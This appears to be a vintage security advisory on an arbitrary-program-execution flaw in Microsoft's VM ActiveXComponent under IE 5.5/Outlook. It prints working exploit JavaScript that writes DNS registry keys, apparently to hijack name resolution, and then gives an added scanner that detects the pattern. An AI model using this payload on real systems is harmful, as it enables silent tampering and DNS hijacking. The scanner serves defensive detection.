Microsoft Virtual Machine com.ms.activeX.ActiveXComponent Arbitrary Program Execution Vulnerability
Georgi Guninski <guninski@guninski.com> has set up the following demonstration pages:

Demo #1 - IE 5.5/Outlook security vulnerability - com.ms.activeX.ActiveXComponent allows executing arbitrary programs. This page creates the file "EA.HTA" in your Startup folder - you shall see the result the next time you logon:
http://www.guninski.com/javaea1.html

Demo #2 - IE 5.5/Outlook security vulnerability - com.ms.activeX.ActiveXComponent allows executing arbitrary programs. This page creates the file "EA" on Desktop:
http://www.guninski.com/javaea2.html

Exploit code submitted by Marcin Jackowski <marcin@jackowski.net>:

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
  try{
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    try{
      Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
    }
    catch(e){}
  }
  catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
  try{
    a2=document.applets[0];
    a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a2.createInstance();
    Shl = a2.GetObject();
    a2.setCLSID("{0D43FE01-F093-11CF-89400-0A0C9054228}");
    try{
      Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
    }
    catch(e){}
  }
  catch(e){}
}
setTimeout("yuzi2()",1000);
</script>
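The listing above leaves recognisable traces in page or mail source: the APPLET tag naming com.ms.activeX.ActiveXComponent, the setCLSID() calls, and the RegWrite() targets. The scanner below is an added example, not code from the original page or its contributors; the function and field names are hypothetical, and the sample input is constructed from strings in the listing.

```javascript
// Added example: static scan of HTML or e-mail source for the pattern in the listing.
// All names here are hypothetical; SAMPLE is constructed, not a captured page.
const APPLET_RE = /<applet\b[^>]*\bcode\s*=\s*["']?com\.ms\.activeX\.ActiveXComponent\b/i;
// Loose match on purpose: the listing contains a CLSID with misplaced hyphens,
// which a strict 8-4-4-4-12 pattern would skip.
const SETCLSID_RE = /\.setCLSID\s*\(\s*["']\{?([0-9a-f-]{30,40})\}?["']\s*\)/gi;
const STRICT_GUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
const REGWRITE_RE = /\.RegWrite\s*\(\s*["']([^"']+)["']/gi;

function scanForActiveXComponentAbuse(html) {
  const finding = {
    appletLoaded: APPLET_RE.test(html), // also true inside a document.write() string
    clsids: [],
    malformedClsids: [],
    registryWrites: [],
  };
  for (const m of html.matchAll(SETCLSID_RE)) {
    const id = m[1].toUpperCase();
    const bucket = STRICT_GUID_RE.test(id) ? finding.clsids : finding.malformedClsids;
    if (!bucket.includes(id)) bucket.push(id);
  }
  for (const m of html.matchAll(REGWRITE_RE)) {
    // Source text uses JavaScript escapes ("HKLM\\System"); normalise to one backslash.
    finding.registryWrites.push(m[1].replace(/\\\\/g, "\\"));
  }
  const instantiates = finding.clsids.length + finding.malformedClsids.length > 0;
  // Applet plus object instantiation is the full pattern; either alone needs a look.
  finding.verdict = finding.appletLoaded && instantiates ? "block"
    : finding.appletLoaded || instantiates ? "review" : "clean";
  return finding;
}

// Constructed sample assembled from strings that appear in the listing above.
const SAMPLE = [
  '<script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");',
  'a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");',
  'a2.setCLSID("{0D43FE01-F093-11CF-89400-0A0C9054228}");',
  'Shl.RegWrite("HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VxD\\\\MSTCP\\\\EnableDns","1");</script>',
].join("\n");

console.log(scanForActiveXComponentAbuse(SAMPLE));
```

Because it matches on raw text rather than a parsed DOM, the scanner also sees an applet that only exists inside a document.write() string, as in the listing.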